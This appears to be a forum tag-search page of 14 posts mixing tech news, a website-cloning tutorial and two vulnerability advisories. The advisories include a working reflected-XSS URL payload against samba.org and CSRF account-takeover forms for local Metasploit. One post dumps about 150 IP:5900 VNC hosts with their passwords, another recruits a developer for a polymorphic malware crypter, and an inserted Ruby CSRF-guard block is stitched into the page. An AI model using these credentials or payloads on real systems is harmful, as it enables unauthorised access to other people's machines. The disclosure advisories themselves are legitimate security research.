
Showing results for tags 'project'.

Found 15 results

  1. Hello, after some time I decided to make a tutorial on how we can copy a website down to the smallest details.

     Step 1: We start by downloading the program needed to clone any website. HTTrack is a program developed by a French team and, fortunately for us, it is distributed for free. We go to HTTrack.com and open the Downloads section, from where we download the newest version.

     Step 2: We look for the site we want to clone. Because a few days ago I said in a YouTube video that I would clone a website belonging to cavaleria.ro (it is just a purely demonstrative example), I will clone that one, so my target address will be Cavaleria.RO

     Step 3: After downloading the program mentioned in the previous step, we install it the classic way: "Next > I accept > Next > ... > Finish"

     Step 4: We open the program and see that we are greeted by a start window. We press Next.

     Step 5: We see that 3 fields appear: Project name, Project category, Base path
     Project name - fill it in with any name; I entered "clonarecavaleria"
     Project category - fill it in with any name; I entered "p_clonarecavaleria"
     Base path - the location where we want the clone of the website to be saved

     Step 6: We fill in the Web Addresses field with the web page we want to clone.

     Step 7: We press Next and then Finish and wait for the program to do its job (depending on the complexity of the site, cloning may take a while; of course, it also depends on the speed of your internet connection)

     Step 8: After the site has been downloaded (when I chose the bluepanel, I stopped the cloning operation after 2-3 minutes because it was downloading every profile of every player, and it would have taken a good few hours)

     Step 9: We go to C:\My Web Sites, or the location you specified in step 5, and open the folder named after your Project name.

     Step 10: We go into the cavaleria.ro folder (the folder named after the URL of the cloned site) and we can open the index.html file and see that it (like all the other files) is identical to that of the original site.

     Observations and clarifications:
     This was a purely demonstrative tutorial.
     This program is unable to copy the site's PHP code as well (that is, the actual script part - the site's functionality).
     This program is very useful if you want to copy the look of a site; it copies down to the smallest details.

     The tutorial was created by me; it has also been posted on my blog! If you don't understand something, leave a comment and I will answer you. Thank you for your time!
  2. Heya! So, I want to start a more serious project that will keep me busy for at least two weeks. The idea is that I want this project to take me out of the beginner/intermediate range I am in. I want to learn through this project. So I want the starting phase to be easy, and the more I develop it, the harder it should become. I will program in C++, console. Probably, in time, I will also make a graphical interface, after I have developed the project for both Linux and Windows. For now, I want everything to stay at the console stage.

     Things I want to focus on in this project:
     - object-oriented programming
     - Standard Template Library

     Probably also Test-Driven Development; I had one attempt before, but it didn't turn out very well... It's rather hard at the beginning.

     Programming language: C++
     Operating system: Linux Manjaro

     If it's OK, and nobody has anything against it, I will make a repository on GitHub and will keep asking for advice in this topic (or in another one, if that is better). So, what project ideas do you have that you can offer me? Thank you, and I apologize for the boring post!
  3. Given the Garena Plus application. (Garena - The Official Site) Can this application be recompiled so that it is hosted by another server? If so, let me know.
  4. The takeover of the SourceForge account for the Windows version of the open-source GIMP image editing tool reported by Ars last week is hardly the first case of the once-pioneering software repository attempting to cash in on open-source projects that have gone inactive or have actually attempted to shut down their SourceForge accounts. Over the past few years, SourceForge (launched by VA Linux Systems in 1999 and now owned by the tech job site company previously known as Dice) has made it a business practice to turn abandoned or inactive projects into platforms for distribution of "bundle-ware" installers.

     Despite promises to avoid deceptive advertisements that trick site visitors into downloading unwanted software and malware onto their computers, these malicious ads are legion on projects that have been taken over by SourceForge's anonymous editorial staff. SourceForge's search engine ranking for these projects often makes the site the first link provided to people seeking downloads for code on Google and Bing search results.

     And because of SourceForge's policies, it's nearly impossible for open-source projects to get their code removed from the site. SourceForge is, in essence, the Hotel California of code repositories: you can check your project out any time you want, but you can never leave.

     Finders, keepers

     As Ars reported, SourceForge posted a statement on the service's blog last week contending that GIMP had abandoned their project, and the site's team had merely picked up the account to maintain it under their "mirror" program for open source and free software projects. But the company did admit that it wrapped the GIMP installer on its site with a Web installer offering commercial software packages to get revenue out of the downloads.

     For some developers who post code to SourceForge, the adware offering bundles around downloads are welcome. In 2013, the FileZilla project's lead developer Tim Kosse authorized SourceForge to put an offer-producing installer around the project's download file. When someone expressed concern about the adware installer in the FileZilla forum, Kosse replied, "This is intentional. The installer does not install any spyware and clearly offers you a choice whether to install the offered software." He added that an unbundled installer was still available on FileZilla's official download page.

     FileZilla was an early participant in DevShare, SourceForge's revenue sharing plan for open-source developers. It was supposed to be opt-in only. By allowing SourceForge to wrap downloads in a Web installer that offered up to three different software bundles, open-source projects could generate some cash to support development. But GIMP never enrolled in DevShare—SourceForge foisted the adware on the project's Windows installer after taking over the project's page.

     On Sunday, the GIMP team issued an official statement through Michael Schumacher, a maintainer of the GIMP website. It said that the GIMP team was never informed of what SourceForge was going to do. "This was done without our knowledge and permission, and we would never have permitted it," Schumacher wrote. Furthermore, he noted, the move broke a promise SourceForge made in November 2013: "We want to reassure you that we will never bundle offers with any project without the developers consent."

     Schumacher said that "SourceForge are abusing the trust that we and our users had put into their service in the past. We don't believe that this is a fixable situation. Even if they promise to adhere to the set of guidelines outlined below, these promises are likely to become worthless with any upcoming management change at SourceForge. However, if SourceForge's current management are willing to collaborate with us on these matters, then there might be a reduction in the damage and feeling of betrayal among the Free and Open Source Software communities."

     One way to fix things, Schumacher said, would be for SourceForge to "provide a method for any project to cease hosting at any SourceForge site if desired, including the ability to: completely remove the project and URLs permanently, and not allow any other projects to take its place; remove any hosted files from the service, and not maintain mirrors, serving installers or files differing from those provided by the project or wrap those in any way; [and] provide permanent HTTP redirects (301) to any other location as desired by the project. This is not unreasonable to expect from a service that purports to support the free software community."

     However, SourceForge's current policy makes pulling a project from the site almost impossible:

     A little something extra

     GIMP left SourceForge in part because of what Schumacher called "the invasion of the big green 'Download' button ads." Those ads, which SourceForge promised to make an effort to block from download pages, appear on nearly every one of the downloads for "mirrored" open-source projects either established or taken over by SourceForge's staff.

     SourceForge isn't alone in hosting these deceptive advertisements that try to fool site visitors into downloading something a little extra. CNET's Downloads.com and other download-focused sites also mirror popular open-source and free software to generate advertising revenue and promote software bundles, and they often include ads with "Download" buttons that are totally unrelated to the software the visitor is seeking. And while many legitimate applications are offered through accompanying downloads on those sites, the ads often deliver software that is of questionable value at best—and malware at worst.

     But those other sites don't have the same open-source heritage that SourceForge's name carries. Launched in 1999 by the company then known as VA Research (and shortly after as VA Linux Systems), SourceForge was the original open community development platform. The software behind SourceForge became an enterprise product as well. By 2007, even the Department of Defense had embraced it to set up the original Forge.mil at the Defense Information Systems Agency—a way for the military's developers to create military development communities around shared projects, even classified ones.

     The enterprise version of SourceForge was sold off to CollabNet in April of 2007. And as competition rose from other source code repositories—chiefly from GitHub, which by January of 2013 had more than five million project repositories—many projects began to abandon SourceForge. The service's character seemed to shift after its sale by Geeknet (along with Slashdot and Freecode) to Dice Holdings for $20 million in September 2012, and that company instead focused on the retail site ThinkGeek. (Update: Geeknet is on track to be acquired by GameStop, after GameStop outbid Hot Topic. This story originally reported the proposed acquisition by Hot Topic from last week.)

     The GIMP-Windows project is still active on SourceForge, and it is still packaged with the bundle-offer installer.

     Update: SourceForge now says that it will discontinue this practice for all "abandoned" projects, and only offer the advertisement-loaded installer as an opt-in for active project developers.

     Source
  5. NOTE: The source code of this project has been released into the public domain and is made available at github.com/decomp.

     This paper was written for the Final Year Engineering Project at Portsmouth University during the academic session 2014 - 2015.

     Poster

     The following poster summarises the project outcomes. It was created for a student project conference which was held at Portsmouth University on the 18th of March 2015.

     Link: https://github.com/mewpaper/decompilation
  6. ######################################################################
     # Exploit Title: Samba.org and OpenLDAP.org Reflected XSS
     # Date: 02/04/2015
     # Author: Yann CAM @ Synetis - ASafety
     # Vendor or Software Link: www.samba.org & www.openldap.org
     # Version: /
     # Category: Reflected Cross Site Scripting
     # Google dork:
     # Tested on: Samba.org and OpenLDAP.org main domains
     ######################################################################

     Samba description :
     ======================================================================
     Samba is a free software re-implementation of the SMB/CIFS networking protocol, and was originally developed by Andrew Tridgell. Samba provides file and print services for various Windows clients and can integrate with a Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Windows NT domains.
     www.samba.org is the main domain of the project.

     OpenLDAP description :
     ======================================================================
     OpenLDAP is a free, open source implementation of the Lightweight Directory Access Protocol (LDAP) developed by the OpenLDAP Project. It is released under its own BSD-style license called the OpenLDAP Public License.
     www.openldap.org is the main domain of the project.

     JitterBug project description :
     ======================================================================
     JitterBug is a web based bug tracking system. It was originally developed by Andrew Tridgell to handle bug tracking, problem reports and queries from Samba users. It is now available under the GNU General Public License in the hope that it will be useful for other projects.
     JitterBug operates by receiving bug reports via email or a web form. Authenticated users can then reply to the message, move it between different categories or add notes to it. In some ways JitterBug is like a communal web based email system. This web page is itself a JitterBug page. You can get an idea of what JitterBug can do by playing with the various links and buttons.
     JitterBug was used by many other open-source projects like Gnome, rsync, The Gimp, linux-patches, ProFTPD, Willows, Java Linux, WindowMaker, mod_ssl, GnuCash or OpenLdap.
     Only OpenLDAP and Samba use it currently, so they are both impacted by the vulnerability described here.

     RXSS Vulnerability description - PoC :
     ======================================================================
     A reflected XSS is available in the JitterBug bug tracking project provided on the samba.org and openldap.org websites.
     Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Samba/OpenLDAP portals, or capture Samba's (OpenLDAP) users' credentials such as cookies.
     It's also possible to forge a fake page with this XSS to provide a backdoored version of software to users.
     This reflected XSS is on the GET "id" variable, which is not properly sanitized before being used in the page.
     Tested on Firefox 35.0.

     PoC:
     http://www.samba.org/cgi-bin/jitterbug/CVS?id=1337</TITLE><img src=x onerror="alert(/Reflected XSS - Yann CAM @asafety/)" /><TITLE>;selectid=1337

     JitterBug future :
     ======================================================================
     As indicated by Samba :
     The JitterBug project is no longer being actively maintained. Jitterbug has known unfixed security vulnerabilities. Unless you know exactly what you are doing, you should not use it any more. If you wish to take over as the maintainer then please contact Andrew Tridgell at jitterbug@tridgell.net

     A possible patch is to sanitize each call of the jitterbug.c file :
         void print_title(char *fmt, ...)
     Which injects GET vars directly in HTML source generated :
         print_title("%s - %s/%s", lp_title(), directory, cgi_variable("id"));
     In the cgi.c file, there is a potential function to escape all dangerous chars :
         char *urlquote(char *s)

     Screenshots :
     ======================================================================
     - http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_001.png
     - http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_002.png
     - http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_001.png
     - http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_002.png

     Solution:
     ======================================================================
     Fixed by OpenLDAP team (no details)
     JitterBug is no longer maintained on Samba website.
     Thanks to both teams, Samba and OpenLDAP, for their kindness and responsiveness.

     Additional resources :
     ======================================================================
     - https://www.samba.org/jitterbug/
     - http://www.openldap.org/its/index.cgi/Web?id=7988
     - https://bugzilla.samba.org/show_bug.cgi?id=10967
     - http://www.asafety.fr/vuln-exploit-poc/contribution-reflected-xss-vulnerabilites-dans-samba-org-et-openldap-org
     - http://www.synetis.com

     Report timeline :
     ======================================================================
     2014-11-26 : Samba ticket created to alert team with details and PoC.
     2014-11-26 : OpenLDAP ticket created to alert team with details and PoC.
     2014-11-26 : OpenLDAP fix the vulnerability.
     2014-11-27 : Samba response with additional questions.
     2015-03-30 : New comment to get a status
     2015-03-30 : JitterBug on Samba.org website is disabled and the project is no longer maintained.
     2015-04-02 : Public advisory

     Credits :
     ======================================================================
     www.synetis.com
     Consulting firm in management and information security
     Yann CAM - Security Consultant @ Synetis | ASafety
     --
     SYNETIS | ASafety
     CONTACT: www.synetis.com | www.asafety.fr

     Source
  7. There are about 500 of them, I think you'll find something good in there. I'll post more for you, at least once a week. Go on, jump in and set up your redirects, since I know that's what you do. You've terrorized me with them; as soon as I see them, I delete them...
81.152.195.110:5900-letmein-[nigel@MUSIC] 81.82.234.116:5900-null-[None] 24.8.213.188:5900-apple-[17inch] 81.26.152.173:5900-111111-[ulu ( 10.10.0.175, 10.10.0.60, 81.26.152.173 ) - service mode] 81.82.240.39:5900-111111-[x0vncserver] 81.133.215.254:5900-111111-[T7A] 81.137.202.219:5900-pa55word-[macmini server] 81.174.165.102:5900-pa55word-[Colophon Server] 81.234.254.138:5900-null-[None] 88.2.196.195:5900-null-[None] 88.0.247.182:5900-null-[Cubie:0.0] 88.2.235.169:5900-null-[None] 88.5.23.112:5900-null-[QEMU] 88.12.13.187:5900-null-[Device 10001] 88.12.5.96:5900-null-[Device 10001] 88.12.44.45:5900-null-[Device 10001] 88.12.152.95:5900-null-[QEMU] 46.229.153.82:5900-null-[x11] 88.14.143.89:5900-null-[FORMACION3] 88.14.100.165:5900-null-[QEMU] 88.14.111.235:5900-null-[QEMU] 88.14.121.18:5900-null-[QEMU] 79.143.179.236:5900-null-[QEMU (static-farmmania)] 37.123.140.247:5900-null-[None] 78.70.20.118:5900-null-[x11] 37.123.141.88:5900-null-[None] 78.70.192.224:5900-null-[None] 37.123.186.100:5900-null-[None] 130.237.67.12:5900-null-[bajibabu@fant] 88.7.75.115:5900-null-[bfa@MicroServer] 79.143.161.228:5900-null-[tuco@dnevna] 212.116.80.42:5900-null-[None] 85.30.34.137:5900-null-[None] 85.30.55.0:5900-null-[None] 85.30.60.206:5900-null-[None] 85.30.154.152:5900-null-[None] 85.30.155.162:5900-null-[None] 213.66.136.156:5900-null-[None] 213.66.136.32:5900-null-[None] 85.30.57.208:5900-null-[None] 193.13.110.248:5900-null-[None] 193.13.36.238:5900-null-[None] 195.19.76.233:5900-null-[QEMU (rosabs3-abf-worker1)] 178.78.60.68:5900-1-[rk7server ( 192.168.0.99 ) - service mode] 5.133.132.127:5900-1-[None] 130.237.25.250:5900-null-[None] 121.8.202.84:5900-1-[gdeie1703160] 121.6.151.139:5900-1-[nlbugis-pc ( 192.168.1.100 )] 121.12.120.72:5900-null-[QEMU (we5dg)] 121.14.195.68:5900-null-[Xen-cms] 121.1.198.99:5900-null-[wavecast@wavecast-01] 128.2.90.39:5900-null-[None] 128.2.144.215:5900-null-[student@kali1] 128.2.144.136:5900-null-[student@kali1] 
128.2.144.139:5900-null-[student@kali1] 128.2.144.138:5900-null-[student@kali1] 128.2.144.140:5900-null-[student@kali1] 128.6.17.244:5900-null-[Device 10002] 128.9.233.14:5900-null-[QEMU (instance-00000422)] 128.9.233.16:5900-null-[QEMU (instance-000000b5)] 128.9.233.18:5900-null-[QEMU (instance-000000b3)] 128.9.233.11:5900-null-[QEMU (instance-00000423)] 128.9.233.13:5900-null-[QEMU (instance-00000426)] 128.9.233.12:5900-null-[QEMU (instance-0000029b)] 128.2.214.34:5900-null-[None] 128.2.245.163:5900-null-[None] 128.2.245.165:5900-null-[None] 128.2.245.161:5900-null-[None] 128.6.17.243:5900-null-[None] 128.2.144.135:5900-null-[student@kali1] 88.12.42.82:5900-123-[DEHESASERVER] 187.58.122.9:5900-123-[svr01 ( 192.168.25.201 ) - service mode] 95.31.221.127:5900-123-[guestmsk] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.13.219.5:5900-123-[cpo-mis-5815] 95.31.137.96:5900-123-[maksimov@x01-policase-prod] 121.17.52.72:5900-123-[pc-20100901yzle] 88.2.222.98:5900-1234-[None] 88.3.119.122:5900-1234-[None] 78.70.14.226:5900-1234-[EXTER T40m] 5.228.58.178:5900-1234-[None] 121.6.181.205:5900-1234-[mah_pms ( 192.168.22.4 ) - application mode] 121.7.152.30:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 88.12.48.199:5900-12345-[WinVNC] 88.10.113.245:5900-12345-[Minerva Mac Server] 130.236.136.28:5900-12345-[None] 187.58.126.213:5900-12345-[SERVIDOR Microsoft Windows Server 2003 R2, Enterprise Edition Service Pack 2 (build 3790)] 128.8.138.146:5900-12345-[Julie Berry’s iMac] 212.116.173.41:5900-123456-[None] 212.116.173.42:5900-123456-[None] 81.200.27.43:5900-123456-[Encelad] 121.12.167.104:5900-123456-[OTHER] 107.6.13.189:5900-123456-[QEMU (WIN)] 107.6.44.202:5900-123456-[win-62fghkhguos ( 10.10.20.6, 107.6.44.202, 169.254.235.96 ) - service mode] 88.11.135.233:5900-12345678-[DVR [000322091864]] 121.6.146.222:5900-12345678-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 
121.6.146.222:5900-1234567890-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 116.88.94.171:5900-0000-[server’s Mac mini] 95.215.99.206:5900-0000-[LKDS-ÏÊ] 79.143.81.46:5900-q1w2e3-[None] 88.0.26.187:5900-qwerty123-[svrppv ( 192.168.31.1 )] 88.5.181.31:5900-qwerty123-[srvppv ( 192.168.1.2, 192.168.25.60, 192.168.25.61 ) - service mode] 88.3.164.90:5900-qwerty123-[svrppv ( 192.168.17.1 )] 88.11.80.10:5900-qwerty123-[svrppv ( 192.168.37.1 )] 88.13.1.162:5900-qwerty123-[svrppv ( 192.168.10.1 )] 88.13.4.146:5900-qwerty123-[svrppv ( 192.168.28.1 )] 88.13.73.144:5900-qwerty123-[svrppv ( 192.168.60.1 )] 88.13.9.8:5900-qwerty123-[svrppv ( 192.168.18.2 )] 88.13.52.137:5900-qwerty123-[svrppv ( 192.168.13.1 )] 88.12.67.68:5900-qwerty123-[svrppv ( 192.168.25.1 )] 88.13.3.176:5900-qwerty123-[svrppv ( 192.168.61.2 )] 88.3.162.166:5900-qwerty123-[None] 88.13.62.54:5900-remote-[compaq] 128.2.75.121:5900-test-[Jim Hawthorne’s iMac] 121.7.222.155:5900-support-[None] 88.12.54.153:5900-master-[VC Project 'visu'] 107.6.13.71:5900-abc123-[QEMU (1066-eh-web1)]
  8. # Exploit Title: Metasploit Project initial User Creation CSRF
     # Google Dork: N/A
     # Date: 14-2-2015
     # Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
     # Vendor Homepage: http://www.metasploit.com/
     # Software Link: http://www.rapid7.com/products/metasploit/editions-and-features.jsp
     # Version: Free/Pro < 4.11.1 (Update 2015021901)
     # Tested on: All OS
     # CVE : N/A

     Vulnerability: Cross Site Request Forgery - (CSRF)
     Info: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

     More Details: After doing some research, I have found that the anti csrf token "authenticity_token" value is not validated from the local server side which will result in a more csrf attack scenario around the whole local metasploit project.

     Affected URL(s)/PoC Code(s):

     -Change Local Metasploit Project User Settings

         <html>
           <body>
             <form action="https://127.0.0.1:3790/users/1" method="POST">
               <input type="hidden" name="utf8" value="?" />
               <input type="hidden" name="_method" value="put" />
               <input type="hidden" name="authenticity_token" value="" />
               <input type="hidden" name="user[fullname]" value="Attacker" />
               <input type="hidden" name="user[email]" value="EMAIL" />
               <input type="hidden" name="user[company]" value="COMPANY" />
               <input type="hidden" name="user[time_zone]" value="Cairo" />
               <input type="hidden" name="commit" value="Save Settings" />
               <input type="submit" value="Submit form" />
             </form>
           </body>
         </html>

     -Full Local Metasploit Project Account Takeover before setting up the first user settings

         <html>
           <body>
             <form action="https://127.0.0.1:3790/users" method="POST">
               <input type="hidden" name="utf8" value="?" />
               <input type="hidden" name="authenticity_token" value="" />
               <input type="hidden" name="user[username]" value="Username" />
               <input type="hidden" name="user[password]" value="PASSWORD" />
               <input type="hidden" name="user[password_confirmation]" value="PASSWORD" />
               <input type="hidden" name="user[fullname]" value="FUll_Name" />
               <input type="hidden" name="user[email]" value="EMAIL" />
               <input type="hidden" name="user[company]" value="COMPANY" />
               <input type="hidden" name="user[time_zone]" value="Cairo" />
               <input type="hidden" name="commit" value="Create Account" />
               <input type="submit" value="Submit form" />
             </form>
           </body>
         </html>

     More Details/Impact:
     -Change Local Metasploit Project User Settings
     -Full Local Metasploit Project Account Takeover before setting up the first user settings

     Report Timeline:
     [-] 14/02/2015: Reported to Rapid7 Security Team
     [-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability
     [-] 17/02/2015: Reply from "Eray Yilmaz" about the Operation and public disclosure rules
     [-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901), https://community.rapid7.com/docs/DOC-3010
     [-] 16/03/2015: Public Disclosure

     Thanks
     --
     Best Regards,
     Mohamed Abdelbaset Elnoby
     Guru Programmer, Information Security Evangelist & Bug Bounty Hunter.
     LinkedIn <https://www.linkedin.com/in/symbiansymoh>
     Curriculum Vitae <http://goo.gl/cNrVpL>
     Facebook <https://fb.com/symbiansymoh>
     Twitter <https://twitter.com/symbiansymoh>

     Source
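The server-side check whose absence the advisory above describes, as an added example that is not part of the original post and is not Metasploit's or Rails' own code: a per-session token is derived with an HMAC, and any state-changing request whose `authenticity_token` is missing, empty or wrong is refused. The `CsrfGuard` class, its method names, the session and params hashes and the sample requests are all assumptions constructed for illustration.

```ruby
require 'openssl'
require 'securerandom'
require 'base64'

# Hypothetical guard for illustration; not Metasploit's or Rails' own code.
class CsrfGuard
  STATE_CHANGING = %w[POST PUT PATCH DELETE].freeze

  def initialize(secret)
    @secret = secret
  end

  # Token handed to the legitimate form: an HMAC over the session id and a
  # per-session nonce, so a page on another origin cannot compute it.
  def issue(session)
    session[:csrf_nonce] ||= SecureRandom.hex(16)
    mac = OpenSSL::HMAC.digest('SHA256', @secret,
                               "#{session[:id]}|#{session[:csrf_nonce]}")
    Base64.urlsafe_encode64(mac)
  end

  # Returns :ok / :ok_safe_method, or a :rejected_* symbol naming the reason.
  def verify(http_method, session, params)
    # Decide on the verb actually sent. A "_method" field (as in the first
    # PoC form) rides on a POST, so an override can never downgrade the check.
    verb = http_method.to_s.upcase
    return :ok_safe_method unless STATE_CHANGING.include?(verb)

    supplied = params['authenticity_token'].to_s
    return :rejected_missing_token if supplied.empty?
    return :rejected_no_session if session[:csrf_nonce].nil?

    constant_time_eq?(supplied, issue(session)) ? :ok : :rejected_bad_token
  end

  private

  # Compare without stopping at the first differing byte.
  def constant_time_eq?(a, b)
    return false unless a.bytesize == b.bytesize

    diff = 0
    a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
    diff.zero?
  end
end

# Constructed sample requests modelled on the two forms in the advisory.
def demo_results
  guard = CsrfGuard.new('constructed-demo-secret')
  session = { id: 'constructed-session-1' }
  token = guard.issue(session)
  update = { 'utf8' => '?', '_method' => 'put', 'authenticity_token' => '',
             'user[fullname]' => 'Attacker' }
  create = { 'authenticity_token' => '', 'user[username]' => 'Username' }
  {
    forged_update: guard.verify('POST', session, update),
    forged_create: guard.verify('POST', {}, create), # no account or session yet
    override_to_get: guard.verify('POST', session, update.merge('_method' => 'get')),
    wrong_token: guard.verify('POST', session,
                              update.merge('authenticity_token' => 'A' * token.length)),
    legitimate: guard.verify('POST', session,
                             update.merge('authenticity_token' => token)),
    read_only: guard.verify('GET', session, {})
  }
end

demo_results.each { |name, result| puts "#{name}: #{result}" } if __FILE__ == $PROGRAM_NAME
```
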
  9. There's a story on Hacker News asking what the hell is going on with the Truecrypt audit. I think that's a fair question, since we have been awfully quiet lately. To everyone who donated to the project, first accept my apologies for the slow pace. I want to promise you that we're not spending your money on tropical vacations (as appealing as that would be). In this post I'd like to offer you some news, including an explanation of why this has moved slowly.

     For those of you who don't know what the Truecrypt audit is: in late 2013 Kenn White, myself, and a group of advisors started a project to undertake a crowdfunded audit of the Truecrypt disk encryption program. To the best of my knowledge, this is the first time anyone's tried this. The motivation for the audit is that lots of people use Truecrypt and depend on it for their security and safety -- yet the authors of the program are anonymous and somewhat mysterious to boot. Being anonymous and mysterious is not a crime, but it still seemed like a nice idea to take a look at their code.

     We had an amazing response, collecting upwards of $70,000 in donations from a huge and diverse group of donors. We then went ahead and retained iSEC Partners to evaluate the bootloader and other vulnerability-prone areas of Truecrypt. The initial report was published here.

     That initial effort was Part 1 of a two-part project. The second -- and much more challenging part -- involves a detailed look at the cryptography of Truecrypt, ranging from the symmetric encryption to the random number generator. We had some nice plans for this, and were well on our way to implementing them. (More on those in a second.)

     Then in late Spring of 2014, something bizarre happened. The Truecrypt developers pulled the plug on the entire product -- in their typical, mysterious way.

     This threw our plans for a loop. We had been planning a crowdsourced audit to be run by Thomas Ptacek and some others. However in the wake of TC pulling the plug, there were questions. Was this a good use of folks' time and resources? What about applying those resources to the new 'Truecrypt forks' that have sprung up (or are being developed?) There were a few other wrinkles as well, which Thomas talks about here -- although he takes on too much of the blame.

     It took us a while to recover from this and come up with a plan B that works within our budget and makes sense. We're now implementing this.

     A few weeks ago we signed a contract with the newly formed NCC Group's Cryptography Services practice (which grew out of iSEC, Matasano and Intrepidus Group). The project will evaluate the original Truecrypt 7.1a which serves as a baseline for the newer forks, and it will begin shortly. However to minimize price -- and make your donations stretch farther -- we allowed the start date to be a bit flexible, which is why we don't have results yet.

     In our copious spare time we've also been looking manually at some portions of the code, including the Truecrypt RNG and other parts of the cryptographic implementation. This will hopefully complement the NCC/iSEC work and offer a bit more confidence in the implementation.

     I don't really have much more to say -- except to thank all of the donors for their contributions and their patience. This project has been a bit slower than any of us would like, but results are coming. Personally, my hope is that they'll be completely boring.

     Source: A Few Thoughts on Cryptographic Engineering: Another update on the Truecrypt audit
  10. Tor — a privacy oriented encrypted anonymizing service, has announced the launch of its next version of Tor Browser Bundle, i.e. Tor version 4.0.4, mostly supposed to improve the built-in utilities, privacy and security of online users on the Internet. Tor Browser helps users to browse the Internet in a completely anonymous way. The powerful Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’ anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere.

      NEW FEATURES

      The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a small number of new features:

      • Update Firefox to 31.5.0esr with important security updates
      • Update OpenSSL to 1.0.1
      • Update NoScript to 2.6.9.15
      • Update HTTPS-Everywhere to 4.0.3

      BUG FIXES

      Meanwhile, the new Tor version 4.0.4 also includes some bug fixes:

      • Bug 14203: Prevent meek from displaying an extra update notification
      • Bug 14849: Remove new NoScript menu option to make permissions permanent
      • Bug 14851: Set NoScript pref to disable permanent permissions

      "A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory," states the Tor project team.

      Tor is generally thought to be a place where users come online to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy oriented services and is mostly used by activists and journalists to circumvent online censorship and surveillance efforts by various countries.

      However, late last year we saw a large-scale cyber attack on the Tor network that quietly seized some of its specialized network servers called Directory Authorities (DA), the servers that help Tor clients to find Tor relays in the anonymous network service.

      On the other hand, last month 12 high-capacity Tor middle relays were launched by Polaris — a new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology — in order to help build more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps reduce finite number of Tor connections occurring at the same time.

      Source
  11. Trey Ford from Project Sonar describes the group’s initiative at Kaspersky’s Security Analyst Summit. The Rapid7 service scans public networks for applications, software, and hardware, then analyzes that cache of information to learn trends and gain insight on common vulnerabilities. Source
  12. Hi, I'm looking for a strong "Ninja" to develop a polymorphic crypter in C++/ASM. If you have the knowledge & experience and are interested in such a project, please PM me: quantommachine@yahoo.com
  13. Update: OK Apple, your turn.

      After raising a ruckus with the disclosure of three unpatched Windows vulnerabilities, Google’s Project Zero research team did the same this week with a trio of security issues in Apple OS X. Project Zero imposes a 90-day deadline on vulnerabilities it reports to affected vendors; if a patch is not delivered inside that time frame, details are automatically made public via its external database.

      The respective OS X bugs were reported to Apple in late October and 90-day deadlines began expiring this week. The Project Zero disclosures also come with proof-of-concept exploit code. A request for comment from Apple was not returned in time for publication. Published reports indicate that the vulnerabilities have been patched in Yosemite 10.10.2, which is in beta.

      The vulnerabilities affect different components of Apple’s flagship operating system, and range from memory corruption and kernel code execution to a sandbox escape. All three require some kind of local access to exploit.

      The sandbox escape vulnerability, OS X networkd “effective_audit_token” XPC type confusion sandbox escape as labeled by Google, may have been mitigated starting in the Yosemite version of OS X. Google refers to a separate advisory for those details. In its disclosure on Tuesday, Google said that the networkd system daemon implements an XPC service API which communicates on behalf of an application. Project Zero said that XPC messages using get parameters are used without checking the type of returned value. This allows messages to reach functions outside the sandbox, Google said.

      One day later, the 90-day deadline expired on an OS X IOKit kernel execution vulnerability. “Calling IOConnectMapMemory on userclient type 2 of “IntelAccelerator” with memory type 3 hits an exploitable kernel NULL pointer dereference calling a virtual function on an object at 0x0,” Google said in its advisory. Part of this disclosure originally included a kernel ASLR bypass, but that was patched in Yosemite 10.10, Google said.

      The third disclosure happened yesterday and is another OS X IOKit kernel memory corruption vulnerability. Google said a Bluetooth device must be connected to exploit this bug, which is due to a bad bzero in IOBluetoothDevice. “Userspace can modify the size in shared memory leading to the bzero writing a controlled number of NULL bytes off the end of the buffer,” the advisory said.

      Project Zero’s automated disclosures are the latest salvo in the industry’s eternal debate over the sharing and distribution of vulnerability details. Microsoft fought back after Google spilled the beans on a trio of its unpatched bugs, one of which Google refused to sit on for an additional two days before Microsoft was to release a patch.

      Source
  14. Don't look now, but Google's Project Zero vulnerability research program may have dropped more zero-day vulnerabilities—this time on Apple's OS X platform.

      In the past two days, Project Zero has disclosed OS X vulnerabilities here, here, and here. At first glance, none of them appear to be highly critical, since all three appear to require the attacker to already have some access to a targeted machine. What's more, the first vulnerability, the one involving the "networkd 'effective_audit_token' XPC," may already have been mitigated in OS X Yosemite, but if so the Google advisory doesn't make this explicit and Apple doesn't publicly discuss security matters with reporters.

      Still, the exploits could be combined with a separate attack to elevate lower-level privileges and gain control over vulnerable Macs. And since the disclosures contain proof-of-concept exploit code, they provide enough technical detail for experienced hackers to write malicious attacks that target the previously unknown vulnerabilities.

      The security flaws were privately reported to Apple on October 20, October 21, and October 23, 2014. All three advisories appear to have been published after the expiration of the 90-day grace period Project Zero gives developers before making reports public.

      Assuming the vulnerabilities remain active in at least some versions of OS X, it wouldn't be the first time Project Zero has gone against a developer's wishes and made unfixed security bugs known to the whole world. The Google-backed program has already published three unpatched vulnerabilities in Windows.

      Source
